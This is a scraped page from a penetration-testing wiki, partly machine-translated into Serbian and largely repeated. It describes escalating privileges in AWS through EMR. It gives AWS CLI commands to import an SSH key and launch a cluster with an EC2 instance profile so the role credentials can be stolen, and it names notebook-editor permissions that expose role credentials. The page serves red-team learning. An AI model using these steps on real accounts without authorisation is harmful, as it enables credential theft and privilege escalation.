AWS - EMR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EMR

Više informacija o EMR u:

AWS - EMR Enum

`iam:PassRole`, `elasticmapreduce:RunJobFlow`

Napadač sa ovim dozvolama može pokrenuti novi EMR klaster povezujući EC2 uloge i pokušati da ukrade njegove akreditive. Imajte na umu da da biste to uradili, morate znati neku ssh privatnu ključ uvezenu u nalog ili da uvezete jedan, i da možete otvoriti port 22 na glavnom čvoru (možda ćete moći to da uradite sa atributima EmrManagedMasterSecurityGroup i/ili ServiceAccessSecurityGroup unutar --ec2-attributes).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Note how an EMR role is specified in --service-role and a ec2 role is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.

Potential Impact: Privesc do EC2 servisne uloge koja je specificirana.

`elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Role.

Čak i ako prikačite IAM ulogu na instancu beležnice, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.

Potential Impact: Privesc do AWS upravljane uloge arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

`elasticmapreduce:OpenEditorInConsole`

Just with this permission an attacker will be able to access the Jupyter Notebook and steal the IAM role associated to it. The URL of the notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Čak i ako prikačite IAM ulogu na instancu beležnice, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.

Potential Impact: Privesc do AWS upravljane uloge arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Elastic Beanstalk Privesc NextAWS - EventBridge Scheduler Privesc

Last updated 8 days ago

EMR

Više informacija o EMR u:

AWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Potential Impact: Privesc do EC2 servisne uloge koja je specificirana.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Role.

Čak i ako prikačite IAM ulogu na instancu beležnice, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.

Potential Impact: Privesc do AWS upravljane uloge arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Čak i ako prikačite IAM ulogu na instancu beležnice, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.

Potential Impact: Privesc do AWS upravljane uloge arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile